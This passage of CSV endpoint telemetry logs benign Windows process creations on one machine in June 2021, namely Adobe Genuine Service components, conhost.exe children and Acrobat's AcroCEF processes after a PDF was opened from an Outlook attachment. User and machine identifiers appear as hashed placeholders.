Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+361,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.597162300+00:00,20408,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_afibmk 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.614178200+00:00,2021-06-23 01:23:34.564332400+00:00,99f9708b-dc3b-44f8-b4c9-e82018a1153c,computerpii_0a470890c60768167990033d701e7bd881398861,157886,False,10.7740.19041.1052,False,11540474045136991,,11540474045172373,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+362,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.598127400+00:00,14468,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_crzhzk 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.614305800+00:00,2021-06-23 01:23:34.564377400+00:00,6494cd1d-0214-4fd0-bc95-2fbb8af51946,computerpii_0a470890c60768167990033d701e7bd881398861,157887,False,10.7740.19041.1052,False,11540474045136991,,11540474045172374,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+363,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.604619600+00:00,16604,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:03.597162300+00:00,20408,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_afibmk 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.762150200+00:00,2021-06-23 01:23:34.564523300+00:00,5c3f2b72-ee5e-416e-9388-7b612fa3ad2d,computerpii_0a470890c60768167990033d701e7bd881398861,157890,False,10.7740.19041.1052,False,11540474045172373,,11540474045172375,2021-06-23 01:22:03.597162300+00:00,20408,2021-06-23 01:22:03.597162300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,20408,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+364,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.605551800+00:00,12664,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:03.598127400+00:00,14468,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_crzhzk 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.764007200+00:00,2021-06-23 01:23:34.564567800+00:00,4a1d5ae9-4812-457a-875d-2d8dbbe34376,computerpii_0a470890c60768167990033d701e7bd881398861,157891,False,10.7740.19041.1052,False,11540474045172374,,11540474045172376,2021-06-23 01:22:03.598127400+00:00,14468,2021-06-23 01:22:03.598127400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,14468,16512,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+365,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.822843200+00:00,13860,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a08084"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a08084""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.865197700+00:00,2021-06-23 01:23:34.564806900+00:00,2caffccb-6c3b-4ec2-95fa-cd30b04a28f0,computerpii_0a470890c60768167990033d701e7bd881398861,157895,False,10.7740.19041.1052,False,11540474045136991,,11540474045172378,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+366,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.838025600+00:00,10564,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:03.822843200+00:00,13860,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a08084"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a08084""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.866055200+00:00,2021-06-23 01:23:34.564903500+00:00,81305f86-1a14-4435-bc53-ed15db7e431b,computerpii_0a470890c60768167990033d701e7bd881398861,157897,False,10.7740.19041.1052,False,11540474045172378,,11540474045172380,2021-06-23 01:22:03.822843200+00:00,13860,2021-06-23 01:22:03.822843200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,13860,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+367,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:03.880075500+00:00,5128,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a08084"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a08084""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:03.822843200+00:00,13860,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a08084"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a08084""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:04.004097600+00:00,2021-06-23 01:23:34.565379700+00:00,46cde679-a0c3-43d9-b959-75e32c66f32a,computerpii_0a470890c60768167990033d701e7bd881398861,157906,False,10.7740.19041.1052,False,11540474045172378,,11540474045172381,2021-06-23 01:22:03.822843200+00:00,13860,2021-06-23 01:22:03.822843200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,13860,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+368,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f6a98158746a5fdbbe076bfb040a7f1343dd8f7d.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:05.371807700+00:00,2021-06-23 01:23:34.565742800+00:00,39b114d9-4058-469a-8c0f-3c2f0a190530,computerpii_0a470890c60768167990033d701e7bd881398861,157914,False,10.7740.19041.1052,False,11540474045172364,,11540474045172384,2021-06-23 01:22:02.166525300+00:00,18796,2021-06-23 01:22:02.166525300+00:00,Acrobat.exe,18796,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:02.169530900+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+369,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:05.406589+00:00,8852,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,10418406401943917537,7287286549748088126,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=1338192383545851382 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:05.470510100+00:00,2021-06-23 01:23:34.565787+00:00,a16962d6-b34f-429d-a7d7-8e30172d8fad,computerpii_0a470890c60768167990033d701e7bd881398861,157915,False,10.7740.19041.1052,False,11540474045172384,,11540474045172385,2021-06-23 01:22:05.247406900+00:00,10312,2021-06-23 01:22:05.247406900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,10312,18560,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:05.241226500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+370,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:05.421938700+00:00,20248,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1900,10418406401943917537,7287286549748088126,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4579831490861316115 --renderer-client-id=2 --mojo-platform-channel-handle=1852 --allow-no-sandbox-job 